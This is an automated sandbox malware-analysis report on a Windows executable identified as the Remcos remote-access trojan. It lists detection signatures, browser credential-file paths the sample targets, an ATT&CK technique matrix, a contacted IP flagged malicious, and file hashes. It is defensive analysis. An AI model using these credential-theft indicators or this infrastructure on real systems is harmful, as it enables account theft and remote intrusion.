                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_0044942D
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040BB6B
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: \key3.db3_2_0040BB6B

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-35QZU7Jump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: cmd.exe3_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Bypass User Account Control                  		1
                  Deobfuscate/Decode Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol111
                  Input Capture                  		2
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution                  		Logon Script (Windows)1
                  Access Token Manipulation                  		3
                  Obfuscated Files or Information                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Windows Service                  		12
                  Software Packing                  		NTDS2
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script22
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets33
                  System Information Discovery                  		SSHKeylogging12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Bypass User Account Control                  		Cached Domain Credentials21
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync31
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                  Process Injection                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  6Ctc0o7vhqKgjU7.exe34%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                  6Ctc0o7vhqKgjU7.exe100%AviraHEUR/AGEN.1306904
                  6Ctc0o7vhqKgjU7.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.06Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersG6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThe6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers?6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.tiro.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.goodfont.co.kr6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.carterandcone.coml6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sajatypeworks.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.typography.netD6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/cabarga.htmlN6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/cThe6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.galapagosdesign.com/staff/dennis.htm6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/frere-user.html6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://geoplugin.net/json.gppW#6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://geoplugin.net/json.gp/C6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.galapagosdesign.com/DPlease6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com/designers86Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fonts.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.kr6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.urwpp.deDPlease6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.zhongyicts.com.cn6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sakkal.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719025391.0000000005960000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            178.237.33.50
                                                                            		geoplugin.netNetherlands
                                                                            		8455ATOM86-ASATOM86NLfalse
                                                                            192.3.64.152
                                                                            		unknownUnited States
                                                                            		36352AS-COLOCROSSINGUStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1549119
                                                                            Start date and time:2024-11-05 10:59:09 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 24s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:6Ctc0o7vhqKgjU7.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@5/3@1/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 99%
                                                                            • Number of executed functions: 58
                                                                            • Number of non-executed functions: 195
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: 6Ctc0o7vhqKgjU7.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            05:00:04API Interceptor4224716x Sleep call for process: 6Ctc0o7vhqKgjU7.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            178.237.33.50z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                                                                            • geoplugin.net/json.gp
                                                                            New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            5Tqze.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            192.3.64.152New Order.exeGet hashmaliciousRemcosBrowse
                                                                              UsoOuMVYCv8QrxG.exeGet hashmaliciousRemcosBrowse
                                                                                New Order.exeGet hashmaliciousRemcosBrowse
                                                                                  SecuriteInfo.com.Trojan.PackedNET.3042.4675.2937.exeGet hashmaliciousRemcosBrowse
                                                                                    Quote.exeGet hashmaliciousRemcosBrowse
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.3135.16188.exeGet hashmaliciousRemcosBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        geoplugin.netz120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                                                                                        • 178.237.33.50
                                                                                        New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        5Tqze.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AS-COLOCROSSINGUSbestgreetingwithbestthingsevermadewithgreatthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                        • 104.168.7.52
                                                                                        orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • 23.95.60.88
                                                                                        Scan docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                        • 104.168.7.52
                                                                                        bin.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 198.12.107.126
                                                                                        givingbestthignswithgreatheatcaptialthingstodo.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                        • 107.173.4.23
                                                                                        Payment Advice-Ref[A22D4YdWsbE4].xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                        • 107.173.4.23
                                                                                        ORDER-24110394.PDF.jsGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.220.6
                                                                                        sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 104.168.36.42
                                                                                        Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                        • 107.173.148.133
                                                                                        New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                        • 198.46.178.148
                                                                                        ATOM86-ASATOM86NLz120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                                                                                        • 178.237.33.50
                                                                                        New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        5Tqze.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6Ctc0o7vhqKgjU7.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1857
                                                                                        Entropy (8bit):5.335252129103664
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HxvvHgJHreylEHj:Pq5qHwCYqh3oPtI6eqzxRH0aymD
                                                                                        MD5:05A6C6CE6A57DDE158E748519EF089B5
                                                                                        SHA1:62A4471748806FA7FF0CEBD3ED25A116B857696A
                                                                                        SHA-256:F548183BE140AF9BE9FF2BD946C716EABC0C6E61F0E946D4B75E55B3F29F9FF7
                                                                                        SHA-512:5358022174E0F48D881253AB5E018982E27BC7B316D7C7C23D18BEE9D67886ACB8A21D7AAF9FA139A770FC36ED69ACBCCBBC857B5D91B087EB212ECE3C036E52
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):957
                                                                                        Entropy (8bit):5.009232287567204
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:qsdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:xPN0GX85mvhjTkvfEro
                                                                                        MD5:759439A00540A5351C6ED1D4E86C08CC
                                                                                        SHA1:B3C8DC85717DA6D27CF8A3F2533216BD9DA8DD0F
                                                                                        SHA-256:457CC36B09721B31358CCB09F7822FBBF3CB120FA03349642814CB0A9B107126
                                                                                        SHA-512:90F41E51A1BA10CE2D3DF77A34FF108BADA8AD3B983689726FC9911796CE735A5650233BD32F0CB2C86B894908E313405FD8DDA00E64C7127958CE9C164EC3A8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:{. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):957
                                                                                        Entropy (8bit):5.007783152825393
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:qsdVauKyGX85jHf3SvXhNlT3/7YvfbYro:xba0GX85mvhjTkvfEro
                                                                                        MD5:F99E3CC739CD019967DE40D24B446288
                                                                                        SHA1:71A5A38A8B0F8AEEE32F920C3409B96B94944873
                                                                                        SHA-256:1A65241C137EC24902D7353417216243DA84A16FA6D94CC7919003996B6EED09
                                                                                        SHA-512:429C42CE09E60E924C5B1B5EAEC01BA02980AFC85B859CD1CEBF8B6A3D30075512932A9163103C3A74A230F7FEDA1467491981BDBF8A1426710E45B9DD0AF63C
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:{. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.833247374701901
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:6Ctc0o7vhqKgjU7.exe
                                                                                        File size:1'042'944 bytes
                                                                                        MD5:5f9342df635d0a624f0284fa5bbd8b54
                                                                                        SHA1:15c64139cc8663711d5521d49e867de1906e0f88
                                                                                        SHA256:63ac85fa66152f936244088e40eb124a6888336a4508f8d3d63d818ad30e4280
                                                                                        SHA512:51c222546e0faa6a6ef580dca8ebea1593ed4843a079c885d029180a82ec031b69542513b97dc6336492870d8d5d8b72305ff2bfdbcc251e2e8dd64ca4fbe400
                                                                                        SSDEEP:24576:3SovmQ+1DClLHxclthaYAsPxhNX7VuZQvuanF:3SMp+1DCllcnh5A+hNkCvuQ
